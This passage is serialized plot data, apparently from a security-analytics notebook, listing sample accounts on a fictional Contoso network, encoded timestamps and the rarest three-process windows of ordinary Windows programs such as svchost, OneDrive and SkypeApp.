",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"SamiraA--CONTOSO\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\"],\"begin\":{\"__ndarray__\":\"ANBlFocjd0IAAPSTiiN3QgBQ3AKOI3dCAGDaIJAjd0IAkHhUkSN3QgBwrOCUI3dCAJCUT5gjd0IAYH2+myN3QgAQZS2fI3dCAGBNnKIjd0IAcFmOpCN3QgBwNQumI3dCAMAceqkjd0IAsAXprCN3QgDAoTqwI3dCAMDVxrMjd0IAwL01tyN3QgDwWYe6I3dCAHCOE74jd0IAgHaCwSN3QgDwXvHEI3dCAJB+sMcjd0IAEKFRyCN3QgCgLs/LI3dCAPAWPs8jd0IAMP+s0iN3QgDgQQ3WI3dCAGCLSNgjd0IAANCK2SN3QgDAt/ncI3dCAEAPROsjd0IAQE/C8CN3QgAgtaXyI3dCAOCdFPYjd0IA4IWD+SN3QgDgbfL8I3dCAIA0wP8jd0IAMFZhACR3QgAwPtADJHdCAIAmPwckd0IA0A6uCiR3QgAg9xwOJHdCAPDeixEkd0IAIMf6FCR3QgBwr2kYJHdCAFAx9Rkkd0IAcIMLGyR3QgCAl9gbJHdCAIB/Rx8kd0IA0Ge2IiR3QgAAUCUmJHdCAIA4lCkkd0IAsCADLSR3QgBgZEUuJHdCAIAIcjAkd0IAAPHgMyR3QgAA2U83JHdCAADBvjokd0IAUKktPiR3QgBQkZxBJHdCAFB5C0Ukd0IAkGF6SCR3QgDwSelLJHdCAEA9FUwkd0IAADJYTyR3QgCwGsdSJHdCAJACNlYkd0IAkOqkWSR3QgCQZjdaJHdCAIDSE10kd0IA4LqCYCR3QgDgovFjJHdCADCLYGckd0IAgHPPaiR3QgCAWz5uJHdCANB1BHAkd0IA4EOtcSR3QgDQKxx1JHdCACAUi3gkd0IAYPz5eyR3QgBA5Gh/JHdCAFDM14Ikd0IAoLRGhiR3QgDgbiKHJHdCALCctYkkd0IA0IQkjSR3QgAQbZOQJHdCACBVApQkd0IAkD1xlyR3QgBwJeCaJHdCAMCna5wkd0IAsA1PniR3QgBQ9r2hJHdCAADeLKUkd0IAEMabqCR3QgAwrgqsJHdCAKCWea8kd0IAkH7osiR3QgDgZle2JHdCAOBOxrkkd0IAQDc1vSR3QgBQ4zy+JHdCAJAfpMAkd0IAkAcTxCR3QgCQn03EJHdCAJDvgcckd0IA8NfwyiR3QgAAwF/OJHdCAHCoztEkd0IAoJA91SR3QgDAOmPYJHdCACB5rNgkd0IAsGAb3CR3QgDgSIrfJHdCAKAx+eIkd0IAYBlo5iR3QgDQAdfpJHdCAHBqDogjd0IA4FR9iyN3QgCwPuyOI3dCANAoW5Ijd0IAMBPKlSN3QgDA/TiZI3dCAFDnp5wjd0IA0NEWoCN3QgAwvIWjI3dCAPCl9KYjd0IAQJBjqiN3QgDAetKtI3dCAEBlQbEjd0IA8E6wtCN3QgBwOR+4I3dCAIAjjrsjd0IAkA39viN3QgDg92vCI3dCAEDi2sUjd0IAYM1JySN3QgDgtrjMI3dCAFChJ9Ajd0IA4IqW0yN3QgCQdQXXI3dCAOBfdNojd0IAcFQJoyV3QgBwag6II3dCAOBUfYsjd0IAsD7sjiN3QgDQKFuSI3dCADATypUjd0IAwP04mSN3QgBQ56ecI3dCANDRFqAjd0IAMLyFoyN3QgDwpfSmI3dCAECQY6ojd0IAwHrSrSN3QgBAZUGxI3dCAPBOsLQjd0IAcDkfuCN3QgCAI467I3dCAJAN/b4jd0IA4PdrwiN3QgBA4trFI3dCAGDNSckjd0IA4La4zCN3QgBQoSfQI3dCAOCKltMjd0IAkHUF1yN3QgDgX3TaI3dCAHBJ490jd0IAQDRS4SN3QgDwHcHkI3dCANAIMOgjd0IAcPKe6yN3QgAg3Q3vI3dCADDHfPIjd0IA8LHr9SN3QgDgm1r5I3dCADCGyfwjd0IAcHA4ACR3QgDwWqcDJHdCALBEFgckd0IAUC+FCiR3QgCQGfQNJHdCANADYxEkd0IAMO7RFCR3QgDQ10AYJHdCAHDCrxskd0IAwKweHyR3QgBgl40iJHdCAACC/CUkd0IAsGtrKSR3QgCwVdosJHdCAABASTAkd0IAMCq4MyR3QgCAFCc3JHdCAHD+lTokd0IAMOkEPiR3QgDg03NBJHdCACC+4kQkd0IAEKhRSCR3QgCAksBLJHdCAPB8L08kd0IAEGeeUiR3QgAwUQ1WJHdCAKA7fFkkd0IAYCXrXCR3QgDQD1pgJHdCAHD6yGMkd0IAYOQ3ZyR3QgDwzqZqJHdCAOC4FW4kd0IAIKOEcSR3QgCAjfN0JHdCANB3Yngkd0IAIGLReyR3QgBwTEB/JHdCAOA2r4Ikd0IA0CAehiR3QgAQC42JJHdCALD1+4wkd0IAUN9qkCR3QgDwydmTJHdCADC0SJckd0IAYJ63miR3QgCQiCaeJHdCAABzlaEkd0IAMF0EpSR3QgCQR3OoJHdCAAAy4qskd0IAgBtRryR3QgCQBsCyJHdCAPDvLrYkd0IA4NqduSR3QgCQxAy9JHdCAMCue8Akd0IAMJnqwyR3QgDgg1nHJHdCAEBuyMokd0IAoFg3ziR3QgCAQqbRJHdCACAtFdUkd0IAMBeE2CR3QgBAAfPbJHdCAHDrYd8kd0IAsNXQ4iR3QgBQwD/mJHdCAPCprukkd0IAkJQd7SR3QgAAf4zwJHdCABBp+/Mkd0IAwFNq9yR3QgBgPdn6JHdCAKAnSP4kd0IAUBK3ASV3QgBg/CUFJXdCAJDmlAgld0IA4NADDCV3QgAQu3IPJXdCAFCl4RIld0IAgI9QFiV3QgDgeb8ZJXdCACBkLh0ld0IAkE6dICV3QgDAOAwkJXdCAOAieycld0IAwA3qKiV3QgCA91guJXdCAMDhxzEld0IAcMw2NSV3QgCAtqU4JXdCABChFDwld0IA4IqDPyV3QgAwdfJCJXdCAHBfYUYld0IAkEnQSSV3QgDQMz9NJXdCAFAerlAld0IAgAgdVCV3QgCw8otXJXdCAMDc+lold0IAsMdpXiV3QgCAsdhhJXdCAACcR2Uld0IA8IW2aCV3QgAwcCVsJXdCAMBalG8ld0IA4EQDcyV3QgAQL3J2JXdCAMAZ4Xkld0IA0ANQfSV3QgBA7r6AJXdCALDYLYQld0IAAMOchyV3QgBArQuLJXdCAPCWeo4ld0IAsIHpkSV3QgAwbFiVJXdCAGBWx5gld0IAIEA2nCV3QgBwKqWfJXdCAMAUFKMld0IA4P6CpiV3QgAg6fGpJXdCAJDTYK0ld0IAsL3PsCV3QgAQqD60JXdCAKCSrbcld0IAsHwcuyV3QgDAZ4u+JXdCAGBR+sEld0IAADxpxSV3QgDQGRH5JHdCAHBqDogjd0IA4FR9iyN3QgCwPuyOI3dCANAoW5Ijd0IAMBPKlSN3QgDA/TiZI3dCAFDnp5wjd0IA0NEWoCN3QgAwvIWjI3dCAPCl9KYjd0IAQJBjqiN3QgDAetKtI3dCAEBlQbEjd0IA8E6wtCN3QgBwOR+4I3dCAIAjjrsjd0IAkA39viN3QgDg92vCI3dCAEDi2sUjd0IAYM1JySN3QgDgtrjMI3dCAFChJ9Ajd0IA4IqW0yN3QgCQdQXXI3dCAOBfdNojd0IA4JHd3SN3QgCAnEvhI3dCAJCPuuQjd0IAgIMp6CN3QgBgd5jrI3dCAGBpB+8jd0IA8F128iN3QgDAT+X1I3dCAABDVPkjd0IAoDXD/CN3QgBQKTIAJHdCAGAcoQMkd0IAoA8QByR3QgBgA38KJHdCAJAZ9A0kd0I=\",\"dtype\":\"float64\",\"shape\":[352]},\"color\":[\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\"],\"index\":[25,26,27,29,30,32,33,36,37,39,40,42,44,45,47,48,50,51,53,54,56,57,58,60,62,65,67,69,70,71,75,79,80,82,84,86,87,88,91,93,94,96,98,99,101,102,103,104,106,110,113,114,117,118,119,120,122,124,126,128,129,131,133,134,136,137,140,142,143,144,146,148,149,151,152,154,155,158,160,162,165,166,167,168,170,172,174,176,177,179,180,182,184,185,188,190,191,193,195,196,198,199,200,202,203,207,209,210,213,214,215,216,218,220,222,224,225,228,229,230,231,232,233,234,236,237,238,239,240,241,243,244,245,246,247,248,250,251,252,253,254,255,410,422,423,424,425,426,427,428,429,430,431,432,433,434,435,436,437,438,439,440,441,442,443,444,445,446,447,448,449,450,451,452,453,454,455,456,457,458,459,460,461,462,463,464,465,466,467,468,469,470,471,472,473,474,475,476,477,478,479,480,481,482,483,484,485,486,487,488,489,490,491,492,493,494,495,496,497,498,499,500,501,502,503,504,505,506,507,508,509,510,511,512,513,514,515,516,517,518,519,520,521,522,523,524,525,526,527,528,529,530,531,532,533,534,535,536,537,538,539,540,541,542,543,544,545,546,547,548,549,550,551,552,553,554,555,556,557,558,559,560,561,562,563,564,565,566,567,568,569,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,1101,1102,1103,1104,1105,1106,1107,1108,1109,1110,1111,1112,1113,1114,1115,1116,1117,1118,1119,1120,1121,1122,1123,1124,1125,1126,1127,1128,1129,1130,1131,1132,1133,1134,1135,1136,1137,1138,1139,1140],\"rarest_window3\":[[\"Cmd(name='backgroundTaskHost', params={'backgroundTaskHost', '10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'c:/windows/system32/backgroundtaskhost.exe'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='svchost', params={'10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'svchost', 'c:/windows/system32/svchost.exe'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='svchost', params={'10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'svchost', 'c:/windows/system32/svchost.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\"],[\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='svchost', params={'10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'svchost', 'c:/windows/system32/svchost.exe'})\"],[\"Cmd(name='SDXHelper', params={'SDXHelper', 'Microsoft Office', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\",\"Cmd(name='sdxhelper', params={'Microsoft Office', 'sdxhelper', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\"],[\"Cmd(name='SearchUI', params={'SearchUI', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.752', 'c:/windows/systemapps/microsoft.windows.cortana_cw5n1h2txyewy/searchui.exe'})\",\"Cmd(name='backgroundTaskHost', params={'backgroundTaskHost', '10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'c:/windows/system32/backgroundtaskhost.exe'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='SearchUI', params={'SearchUI', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.752', 'c:/windows/systemapps/microsoft.windows.cortana_cw5n1h2txyewy/searchui.exe'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='SearchUI', params={'SearchUI', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.752', 'c:/windows/systemapps/microsoft.windows.cortana_cw5n1h2txyewy/searchui.exe'})\"],[\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='svchost', params={'10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'svchost', 'c:/windows/system32/svchost.exe'})\"],[\"Cmd(name='SearchUI', params={'SearchUI', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.752', 'c:/windows/systemapps/microsoft.windows.cortana_cw5n1h2txyewy/searchui.exe'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='SearchUI', params={'SearchUI', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.752', 'c:/windows/systemapps/microsoft.windows.cortana_cw5n1h2txyewy/searchui.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='svchost', params={'10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'svchost', 'c:/windows/system32/svchost.exe'})\"],[\"Cmd(name='SDXHelper', params={'SDXHelper', 'Microsoft Office', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\",\"Cmd(name='sdxhelper', params={'Microsoft Office', 'sdxhelper', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='svchost', params={'10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'svchost', 'c:/windows/system32/svchost.exe'})\"],[\"Cmd(name='svchost', params={'10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'svchost', 'c:/windows/system32/svchost.exe'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='SearchUI', params={'SearchUI', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.752', 'c:/windows/systemapps/microsoft.windows.cortana_cw5n1h2txyewy/searchui.exe'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='backgroundTaskHost', params={'backgroundTaskHost', '10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'c:/windows/system32/backgroundtaskhost.exe'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='svchost', params={'10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'svchost', 'c:/windows/system32/svchost.exe'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\"],[\"Cmd(name='backgroundTaskHost', params={'backgroundTaskHost', '10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'c:/windows/system32/backgroundtaskhost.exe'})\",\"Cmd(name='backgroundTaskHost', params={'backgroundTaskHost', '10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'c:/windows/system32/backgroundtaskhost.exe'})\",\"Cmd(name='SearchUI', params={'SearchUI', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.752', 'c:/windows/systemapps/microsoft.windows.cortana_cw5n1h2txyewy/searchui.exe'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='svchost', params={'10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'svchost', 'c:/windows/system32/svchost.exe'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='SearchUI', params={'SearchUI', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.752', 'c:/windows/systemapps/microsoft.windows.cortana_cw5n1h2txyewy/searchui.exe'})\"],[\"Cmd(name='backgroundTaskHost', params={'backgroundTaskHost', '10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'c:/windows/system32/backgroundtaskhost.exe'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='sdxhelper', params={'Microsoft Office', 'sdxhelper', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\",\"Cmd(name='SDXHelper', params={'SDXHelper', 'Microsoft Office', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\"],[\"Cmd(name='SearchUI', params={'SearchUI', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.752', 'c:/windows/systemapps/microsoft.windows.cortana_cw5n1h2txyewy/searchui.exe'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='HxTsr', params={'c:/program files/windowsapps/microsoft.windowscommunicationsapps_16005.11029.20108.0_x64__8wekyb3d8bbwe/hxtsr.exe', 'Microsoft Office', 'HxTsr', '16.0.11029.20104'})\"],[\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='svchost', params={'10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'svchost', 'c:/windows/system32/svchost.exe'})\"],[\"Cmd(name='SearchUI', params={'SearchUI', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.752', 'c:/windows/systemapps/microsoft.windows.cortana_cw5n1h2txyewy/searchui.exe'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='svchost', params={'10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'svchost', 'c:/windows/system32/svchost.exe'})\"],[\"Cmd(name='backgroundTaskHost', params={'backgroundTaskHost', '10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'c:/windows/system32/backgroundtaskhost.exe'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='SearchUI', params={'SearchUI', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.752', 'c:/windows/systemapps/microsoft.windows.cortana_cw5n1h2txyewy/searchui.exe'})\"],[\"Cmd(name='backgroundTaskHost', params={'backgroundTaskHost', '10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'c:/windows/system32/backgroundtaskhost.exe'})\",\"Cmd(name='SDXHelper', params={'SDXHelper', 'Microsoft Office', 